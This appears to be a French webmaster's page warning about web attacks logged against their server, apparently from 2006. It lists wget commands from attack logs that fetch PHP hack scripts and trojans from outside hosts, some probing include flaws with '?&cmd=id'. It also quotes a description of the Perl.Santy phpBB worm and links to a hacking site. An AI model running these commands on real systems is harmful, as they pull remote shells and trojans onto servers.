Voici une liste récente des attaques web à destination de ce serveur web et le détail de ces scripts malveillants ! Qui sont soit des virus à destinations des ordinateurs des internautes, soit des injections pour pénétrer et prendre la main sur les serveurs web dans le but d'en faire par exemple un espace de stockage... et dans le pire des cas de films pédophiles ou d'œuvres sans que vous ayez les droits de diffusion... vous imaginez les dégâts d'étique et administratif ?
Ci dessous une liste (datant de 2006) de sites possédant des Hack Script PHP, permettant au hacker d'avoir une console sur votre serveur, si vous avez une faille d'include.
wget --output-document=tool25.png "http://hcaku.iespana.es/tool25.png?&cmd=id" Hacktool wget --output-document=therules25.png "http://hcaku.iespana.es/therules25.png" Trojan horse is a generic detection for various Trojan horse programs. wget --output-document=cmd.txt "http://otravesso.100free.com/cmd.txt?&cmd=id" Hacktool (IHM) wget --output-document=talikasih.txt "http://www.geocities.com/sakitcrew_dalnet/talikasih.txt" Hacktool (Upload file) wget --output-document=cse.gif "http://www.lfxmsc.gov.cn/cse.gif?&cmd=id" ... wget --output-document=energie.txt "http://dooku.anonimoserver.com/~web/energie.txt" Perl.Santy Discovered on: December 21, 2004 Last Updated on: January 16, 2005 11:39:21 PM Perl.Santy is a worm written in Perl script that attempts to spread to Web servers running versions of the phpBB 2.x bulletin board software prior to 2.0.11, which are vulnerable to the PHPBB Viewtopic.PHP PHP Script Injection Vulnerability. Other systems are not affected. If successful, the worm copies itself to the server and overwrites the files with the following extensions: * .asp * .htm * .jsp * .php * .phtm * .shtm The worm uses the Google search engine to find potential new infection targets. Google has now implemented blocking Perl.Santy search requests, which is expected to greatly reduce the worm's ability to propagate and lower the risk of further infections.
Un site français http://10function.kicks-ass.org/, parlant de hacking et répertoriant protocoles, script et outils d'analyse, de scan, etc...